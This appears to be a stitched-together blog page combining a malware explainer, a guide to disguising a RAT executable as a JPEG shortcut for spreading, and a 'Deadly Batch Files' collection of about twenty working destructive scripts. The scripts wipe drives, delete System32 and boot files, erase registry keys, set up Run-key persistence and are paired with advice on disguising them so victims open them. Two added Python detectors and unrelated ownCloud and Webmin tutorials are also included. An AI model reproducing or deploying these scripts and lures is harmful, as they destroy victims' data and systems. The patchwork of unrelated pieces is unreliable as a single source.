If I had a dollar for every time I've been asked that, I'd buy a Porsche. Next time someone asks you the same question, just point them to this document:

Malware can be harmful even while a machine is not connected to the internet. Malware can infect files, steal personal data, steal credentials, or use the target computer as a zombie. Some malware is professionally written to perform a specific task and to spread itself across networks without needing a host file; this branch of malware is known as a worm.

Virus: Computer viruses are malicious pieces of software designed to infect files and spread themselves. Viruses usually infect executable files (.exe). Let's see how they spread.

Say a virus has infected one exe file. Each infected file then infects another, so the count doubles at each step: 1, 2, 4, 8, and so on.

Classic viruses are written in assembly (a low-level language that works directly with the machine) and infect exe files in the current directory. A virus can be coded in batch, C and almost any other language, but it is strongest when it works directly with the system.

Botnet: A botnet is a network of infected machines ("bots" or "zombies") controlled by a single attacker; the malware installed on each machine is the bot. When a system is infected it becomes a slave of the attacker, who uses it to mine bitcoin, steal credentials, perform DDoS attacks, click ads, send spam, and so on. Botnets are classified by how they receive commands: IRC, HTTP or P2P.

Most of the successful botnets are written in C and C++.

Worm: As discussed, a worm is a special type of malware that performs certain tasks and spreads on its own. It can steal data, spy on a system, steal credentials, etc. A worm spreads much faster than other malware. It may use a Windows exploit to spread (the Sasser worm), mass mailing (MyDoom, Love Letter), and so on. Worms are mostly coded in C and C++; Love Letter was written in VBScript.

Malware spreads via USB, EXE, RAR, LAN, exploits and mass mailing.


But what about Spyware?

Malware is an umbrella term that encompasses several types of harmful software. Spyware is just one type of malware, so all spyware is malware, but not all malware is spyware.

Read more : http://www.ehow.com/facts_6800011_difference-between-spyware-malware.html


How to hide an .exe file as a .jpg (noob friendly; used for RAT spreading/e-whoring)

This probably will not work on sophisticated IT personnel. The average user however...


1) First, create a new folder and make sure that the option 'show hidden files and folders' is checked and 'hide extensions for known file types' is unchecked.
Basically you need to see hidden files and the extensions of all the files on your PC.

2) Paste a copy of your server in the newly created folder. Let's say it's called 'server.exe' (that's why you need extensions showing: you need to see it to change it).

3) Now rename this 'server.exe' to whatever you want, say 'picture.jpeg'.

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to Properties (on the file me.jpeg); you need to make some changes there.

8) First of all, delete all the text in the field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:.\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:.\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) Inside the RAR or ZIP file you can see the file properties, and even after all this work you can see that the shortcut is recognized as a shortcut, but hopefully the person you sent it to doesn't know that and is going to open it.

*I am not responsible for what you do/do not do with this tutorial. Educational purposes only.
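The two files described above are a renamed executable and a shortcut, and both betray themselves by their leading bytes no matter what they are called. The following added example (not part of the original post) scans a directory and flags any file with a media-looking name whose content starts with the PE "MZ" signature or the Shell Link (.lnk) header; the sample files it writes are constructed header-only stubs.

```python
import os
import tempfile

JPEG_MAGIC = b"\xff\xd8\xff"
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00"  # Shell Link HeaderSize 0x4C + start of LinkCLSID
DECOY_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".avi", ".mov", ".txt")

def classify(path):
    """Identify a file by its leading bytes; the name is never consulted."""
    with open(path, "rb") as f:
        head = f.read(16)
    if head.startswith(b"MZ"):
        return "pe-executable"
    if head.startswith(LNK_MAGIC):
        return "shell-link"
    if head.startswith(JPEG_MAGIC):
        return "jpeg"
    return "other"

def disguised_files(directory):
    """(name, kind) for files whose media-looking name fronts an executable or shortcut."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        ext = os.path.splitext(name)[1].lower()
        kind = classify(path)
        if ext in DECOY_EXTS and kind in ("pe-executable", "shell-link"):
            findings.append((name, kind))
    return findings

def build_sample(directory):
    """Constructed sample: header-only stubs, nothing here runs or links anywhere."""
    samples = {
        "picture.jpeg": b"MZ" + b"\x00" * 62,            # renamed 'server.exe': DOS header signature only
        "me.jpeg": LNK_MAGIC + b"\x00" * 8,              # the shortcut from step 6: .lnk header only
        "real.jpg": JPEG_MAGIC + b"\xe0" + b"\x00" * 12,  # a genuine JPEG start
    }
    for name, data in samples.items():
        with open(os.path.join(directory, name), "wb") as f:
            f.write(data)

def demo():
    """Build the sample in a scratch directory and return what the scan flags."""
    with tempfile.TemporaryDirectory() as d:
        build_sample(d)
        return disguised_files(d)

if __name__ == "__main__":
    for name, kind in demo():
        print(f"{name}: extension says media, content is {kind}")
```

Explorer never displays the .lnk extension, even with "hide extensions for known file types" unchecked, so a shortcut saved as 'me.jpeg' is listed as 'me.jpeg'; checking content rather than name is what catches it.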

Deadly Batch Files

From an anonymous source. While it's newbish and outdated, ie, some of this may not work on win7 or newer, I think they can be useful for some chaos in a pinch.

I haven't taken the time to play with all of them yet so BE CAREFUL!
To be safe run them in a VM for testing.

Do NOT run these on your machine!

================================

Here is a batch file virus which can:

1. Copy itself into startup
2. Copy itself over one thousand times into random spots on your computer
3. Hide itself and all other created files
4. Task-kill MSN, Norton, Windows Explorer, LimeWire
5. Swap the left mouse button with the right one
6. Open alert boxes
7. Change the time to 12:00 and shut down the computer

Copy this code into Notepad and save it as Greatgame.bat (while saving, select "All Files" instead of "Text").

Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP


No 2:-

Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as kinng.bat and the batch file is created .


No 3:-

How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.


No 4 :-

How to stop someone's internet access::::

@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. Their IP address will be released, and therefore they won't be able to use the connection.

However, this is VERY easy to fix. Simply type in IPconfig /renew


No 5 :-

ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a


No 6:-

Open Notepad
Write / copy the below command there:
" del c:\WINDOWS\system32\*.*/q " without quote
and save as " anything.bat"
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.


No 7:-

Process:
Open Notepad
Copy the below command there
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.


No 8 :-

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .


No 9 :-

Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.


No 10:-

Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.


No 11 :-

Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.


No 12:-

Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.


No 13 :-

This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat


No 14:-

This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs


No 15 :-

The Most Simple Virus To Crush The Window
It Only Works With Windows XP

@Echo off
Del C: *.* |y

Save It As Anything.bat


No 16 :-

Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


No 17:-

Shutdowns Computer Every time It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


No 18 :-

Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File


No 19 :-

Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

No 20 :-

System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File


No 21:-

Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will shut down the computer every time it starts up!

Here is how:

- Open Notepad

- Type:

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

- File >> Save As...

- Name it: virus.bat

- Start >> All Programs

- Right click on Startup >> Open

- This opens the Startup folder

- Paste the virus.bat file here!

*** That's all , now the computer will
automatically shutdown on every start up !

How to Spread it:

Windows doesn't allow to change the icon of .bat files. Therefore what you can do is :
Right click on the .bat file
Click on CREATE SHORTCUT
And hide the original file.
Now as this newly created file is just the shortcut, you can easily change its icon.
Right click on this shortcut
properties >>>..customize>>..choose icon
Now give an attractive icon to it.
Now name it something interesting. eg. PROTOTYPE or IGI etc.
Now your victim would think it to be the game , and he will be easily corrupted.
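Several of the scripts above persist by writing a .bat or .vbs path into the HKLM or HKCU Run key. The following added example (not part of the original post) audits a `reg export` text dump of a Run key and reports every value that launches an interpreted script instead of a compiled program; the dump is a constructed sample whose entries mirror the Logoff and startAPI values the scripts write, not data from a real machine.

```python
import re

# Constructed .reg export of the HKCU Run key (sample, not a real machine).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Logoff"="C:\\WINDOWS\\wscript.vbs"
"startAPI"="c:\\windows\\hartlell.bat"
'''

# Interpreted script types that are rarely a legitimate login-time autostart on their own.
SCRIPT_EXTS = (".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1")

def unescape(value):
    """Undo .reg string escapes: a backslash before a backslash or quote."""
    return re.sub(r'\\(.)', r'\1', value)

def parse_reg_values(text):
    """Yield (key, value_name, data) for quoted string values in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            if data.startswith('"') and data.endswith('"'):
                yield key, name.strip('"'), unescape(data[1:-1])

def program_path(command):
    """First token of a command line: a quoted path or the text up to the first space."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]

def suspicious_run_entries(text):
    """Run-key values whose program is a script rather than a compiled executable."""
    findings = []
    for key, name, data in parse_reg_values(text):
        if not key.lower().endswith("\\currentversion\\run"):
            continue
        prog = program_path(data).lower()
        if prog.endswith(SCRIPT_EXTS):
            findings.append((name, prog))
    return findings

if __name__ == "__main__":
    print(suspicious_run_entries(SAMPLE_REG))
```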


Saturday, October 25, 2014

How to backup OwnCloud instance

Straight from the owncloud Administrator's manual. 

Backing up ownCloud

To backup an ownCloud installation there are three main things you need to retain:
  1. The config folder
  2. The data folder
  3. The database

Backup Folders

Simply copy your config and data folder (or even your whole ownCloud install and data folder) to a place outside of your ownCloud environment. You could use this command:
rsync -Aax owncloud/ owncloud-dirbkp_`date +"%Y%m%d"`/

Backup Database

MySQL

MySQL is the recommended database engine. To backup MySQL:
mysqldump --lock-tables -h [server] -u [username] -p[password] [db_name] > owncloud-sqlbkp_`date +"%Y%m%d"`.bak

SQLite

sqlite3 data/owncloud.db .dump > owncloud-sqlbkp_`date +"%Y%m%d"`.bak

PostgreSQL

PGPASSWORD="password" pg_dump owncloud -h [server] -U [username] -f owncloud-sqlbkp_`date +"%Y%m%d"`.bak

Install Latest Webmin in Ubuntu 14.04 From Official Repository



This tutorial shows how to install the latest version of Webmin in Ubuntu Linux from its official repository.
As you may know, Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely.
To get started, login your remote server and follow the steps below:
1. Run below command to edit the source file:
sudo vi /etc/apt/sources.list
2. Press i on keyboard to start editing the file and add this line into the end:
deb http://download.webmin.com/download/repository sarge contrib
Press Esc to leave edit mode, then type :wq and press Enter to save the changes.
3. Now execute command to download and install the key:
wget -q http://www.webmin.com/jcameron-key.asc -O- | sudo apt-key add -
4. After that, you can always use below commands to install the latest version of Webmin:
sudo apt-get update

sudo apt-get install webmin
Finally in your client’s web browser go to the webmin login page https://ubuntu-serverip:10000


